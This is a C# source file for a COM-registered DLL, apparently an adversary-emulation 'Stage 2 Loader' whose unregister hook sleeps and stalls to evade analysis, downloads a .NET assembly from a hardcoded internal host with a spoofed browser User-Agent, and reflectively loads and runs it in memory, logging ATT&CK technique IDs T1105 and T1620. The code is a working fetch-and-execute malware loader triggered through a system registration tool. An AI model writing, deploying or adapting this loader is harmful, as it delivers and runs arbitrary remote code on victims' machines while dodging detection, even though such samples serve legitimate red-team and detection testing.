using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;

[ComVisible(true)]
[Guid("A3F1C42B-8D9F-4E7A-B5D2-6C8E1F9A3B7D")]
public class Klpxyzmn
{
    const string qwmnb = "10";
    const string zxddff = "http://10.0.0.49:8000/";
    const string tyunm = "6471";
    const string vbncx = "http://10.0.0.49:8000//stage/6471/3?endpoint_id=10";
    const string fghjkl = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    const int ytpqwe = 3000;

    [ComUnregisterFunction]
    public static void Rwqazxcv(Type t)
    {
        Thread.Sleep(new Random().Next(1000, 5000));
        
        if (Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432") != null ||
            Environment.GetEnvironmentVariable("ProgramFiles(x86)") != null)
        {
            int m = 0;
            for (int i = 0; i < 1000000; i++) m ^= i;
        }

        string lgf = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), 
            tyunm, $"{DateTime.Now:yyyyMMddHHmmss}-Log.txt");
        
        try
        {
            Directory.CreateDirectory(Path.GetDirectoryName(lgf));
            
            byte[] s3 = null;
            using (WebClient wc = new WebClient())
            {
                wc.Headers.Add("User-Agent", fghjkl);
                wc.Proxy = null;
                
                string url = $"{zxddff}{vbncx}?id={qwmnb}&sim={tyunm}";
                s3 = wc.DownloadData(url);
                
                File.AppendAllText(lgf, 
                    $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {qwmnb}-{tyunm}-T1105=1\n");
            }

            if (s3 != null && s3.Length > 0)
            {
                Assembly asm = Assembly.Load(s3);
                MethodInfo ep = asm.EntryPoint;
                if (ep != null)
                {
                    object[] prm = new object[] { new string[] { } };
                    ep.Invoke(null, prm);
                    
                    File.AppendAllText(lgf, 
                        $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {qwmnb}-{tyunm}-T1620=1\n");
                }
            }
        }
        catch (Exception ex)
        {
            try
            {
                if (File.Exists(lgf))
                {
                    if (ex.Message.Contains("404") || ex.Message.Contains("403"))
                        File.AppendAllText(lgf, 
                            $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {qwmnb}-{tyunm}-T1105=0\n");
                    else
                        File.AppendAllText(lgf, 
                            $"[{DateTime.Now}][Stage 2 Loader-DLL Universal NET]: {qwmnb}-{tyunm}-T1620=0\n");
                }
            }
            catch { }
        }
    }
}